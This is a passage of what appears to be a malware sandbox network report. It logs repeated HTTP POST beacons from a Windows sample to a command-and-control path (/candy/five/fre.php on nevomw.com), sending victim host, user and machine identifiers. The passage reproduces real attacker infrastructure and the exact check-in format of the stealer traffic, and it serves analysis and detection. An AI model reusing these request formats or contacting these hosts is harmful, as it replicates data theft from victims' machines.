                                            17 | 192.168.2.6 | 49730 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:50.187410116 CET | 95 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:50.239814043 CET | 95 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:50.313590050 CET | 95 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:50 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            170 | 192.168.2.6 | 49918 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:00.838684082 CET | 1563 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:00.891263962 CET | 1563 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:00.965354919 CET | 1564 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            171 | 192.168.2.6 | 49919 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:01.222614050 CET | 1564 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:01.275552988 CET | 1565 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:01.355035067 CET | 1565 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:01 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            172 | 192.168.2.6 | 49920 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:01.607789993 CET | 1566 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:01.660707951 CET | 1566 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:01.748774052 CET | 1567 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:01 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            173 | 192.168.2.6 | 49921 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:02.042783022 CET | 1567 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:02.099517107 CET | 1568 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:02.174634933 CET | 1568 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:02 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            174 | 192.168.2.6 | 49922 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:02.488890886 CET | 1569 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:02.541819096 CET | 1569 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:02.615942001 CET | 1569 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:02 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            175 | 192.168.2.6 | 49923 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:02.873127937 CET | 1571 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:03.024460077 CET | 1571 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:03.102365971 CET | 1572 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:03 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            176 | 192.168.2.6 | 49924 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:03.408857107 CET | 1573 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:03.460256100 CET | 1573 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:03.534225941 CET | 1574 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:03 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            177 | 192.168.2.6 | 49925 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:03.821188927 CET | 1574 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:03.874212980 CET | 1575 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:03.950833082 CET | 1575 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:03 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            178 | 192.168.2.6 | 49926 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:04.227868080 CET | 1576 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:04.281078100 CET | 1576 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:04.356916904 CET | 1577 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:04 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            179 | 192.168.2.6 | 49927 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:04.684159994 CET | 1577 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:04.737780094 CET | 1578 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:04.824449062 CET | 1578 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:04 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            18 | 192.168.2.6 | 49731 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:50.629810095 CET | 96 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:50.681869030 CET | 97 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:50.756248951 CET | 97 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:50 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            180 | 192.168.2.6 | 49928 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:05.082818985 CET | 1579 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:05.144393921 CET | 1579 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:05.223505020 CET | 1579 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:05 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            181 | 192.168.2.6 | 49929 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:05.706168890 CET | 1580 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:05.764142036 CET | 1581 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:05.846091032 CET | 1581 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:05 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            182 | 192.168.2.6 | 49930 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:06.116519928 CET | 1582 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:06.182387114 CET | 1582 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:06.257916927 CET | 1582 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:06 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            183 | 192.168.2.6 | 49931 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:06.510435104 CET | 1583 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:06.562309027 CET | 1584 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:06.636279106 CET | 1584 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:06 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            184 | 192.168.2.6 | 49932 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:06.913352013 CET | 1585 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:06.966228962 CET | 1585 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:07.043773890 CET | 1585 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            185 | 192.168.2.6 | 49933 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:07.374504089 CET | 1586 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:07.433208942 CET | 1586 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:07.512545109 CET | 1587 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
